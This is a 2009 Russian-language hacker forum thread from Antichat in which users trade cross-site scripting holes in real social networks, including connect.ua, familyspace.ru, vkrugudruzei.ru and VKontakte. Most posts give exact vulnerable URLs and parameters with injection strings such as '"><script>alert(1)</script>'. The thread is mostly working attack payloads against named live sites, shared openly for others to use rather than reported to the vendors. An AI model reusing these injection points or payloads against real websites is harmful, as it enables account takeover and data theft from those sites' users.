Форум АНТИЧАТ - Уязвимости в соц. сетях

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Социальные сети (https://forum.antichat.xyz/forumdisplay.php?f=133)

- - Уязвимости в соц. сетях (https://forum.antichat.xyz/showthread.php?t=102168)

.:EnoT:.

20.01.2009 07:14

Уязвимости в соц. сетях

По многочисленным просьбам пользователей и одного из модераторов раздела Уязвимостей создана данная тема.

Теперь все уязвимости постим в этой теме. Отдельно созданные темы будут удаляться!

Shadow_p1raT

20.01.2009 08:21

Буду пейвым

connect.ua

ХSS в панели Фотография

Код:

http://connect.ua/v2/profile?edit&photo&error=[XSS]

XSS в Поиске

Код:

http://connect.ua/v2/search?users=&q=">[XSS]

Ну и на десерт XSS в Личных сообщениях,поле Тема
Текст темы:

Код:

</title>[XSS]

А вообще ксс там повсюду.Интересно какую тарву курили разработчики:)

Shadow_p1raT

20.01.2009 14:56

Familyspace.ru

XSS в Поиске

Код:

http://www.familyspace.ru/index.php?page=search&pn=1&first_nam=">[XSS]

XSS при просмотре профиля

Код:

http://www.familyspace.ru/index.php?page=profile&user_id=[тут id пользователя][XSS]

Пример

Код:

http://www.familyspace.ru/index.php?page=profile&user_id=75212<script>alert()</script>

А тут сходу 2 XSS уязвимая переменная message и from_page

Код:

http://www.familyspace.ru/index.php?page=edit_profile&message=">[XSS]&from_page=">[XSS]

Пример:

Код:

http://www.familyspace.ru/index.php?page=edit_profile&message="><script>alert(1)</script>&from_page="><script>alert(2)</script>

Наверно разработчики предыдущего проекта поделились травой с этими:)

s0l_ir0n

21.03.2009 03:54

http://majormo.ru
XSS в статусе. (выставляется через настройки профайла)

Failure

27.03.2009 04:34

Код:

http://vkrugudruzei.ru/support/forget.asp?forgetemail=%22%3E%3Cscript%3Ealert(%27xss%27);%3C/script%3E

только что нашел, что соц. сеть, что хсс :)

JOHNik

05.06.2009 00:01

:( все прикрыли тока что! быстро ребята работают!
для тех кто не вкурил рядом с вкладкой "Личная информация" есть ссылка "[редактировать]"
Пишем в форму (кроме форм "Любимые цитаты:" и "О себе:" ) например "Любимые фильмы:" [XSS] потом сохраняем
Появляется ссылка если по ней перейти наша [XSS] оказывается тут:

Код:

<script type="text/javascript">

 qCur = 4;

 ge('qinput').value='[XXS]';

 ge('qinput').focus();

 ge('qdrop').innerHTML = qArr[qCur][1];

 sOn = 1;

 newSearch = 1;

 function globalSearch() {

  var force = setCriteria(qArr[qCur][3], ge('qinput').value);

  updateResults(force);

  hide('qfriends');

  qfCur = -1;

  //  ge('qinput').blur();

 }

</script>

ну сами видите где! (сейчас админы вконтакте подредактировали этот блок, старого у меня не осталось) там то она и работала.
Я тут новичок, так что если че не так пишите в личку, буду рад =)))

Время: 16:39